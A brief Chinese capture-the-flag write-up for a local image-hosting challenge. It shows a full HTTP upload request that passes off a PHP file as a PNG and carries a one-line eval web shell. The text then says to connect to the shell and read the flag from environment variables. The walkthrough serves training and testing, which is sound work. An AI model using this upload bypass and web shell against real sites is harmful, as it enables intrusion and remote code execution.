LOADING

垫刀之路03_这是一个图床

网络安全

垫刀之路03: 这是一个图床

上传图片,抓包,在数据中插入一句话木马即可,修改文件名为php

POST /upload.php HTTP/1.1
Host: 127.0.0.1:3437
Content-Length: 552
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"
Accept-Language: zh-CN
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBmBJ9J5hljeGxGdZ
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1:3437
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:3437/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryBmBJ9J5hljeGxGdZ
Content-Disposition: form-data; name="image"; filename="test.php"
Content-Type: image/png

<?php @eval($_POST['attack']);?>
------WebKitFormBoundaryBmBJ9J5hljeGxGdZ--

连接,鼠标右键url地址,打开虚拟终端,输入env

找到flag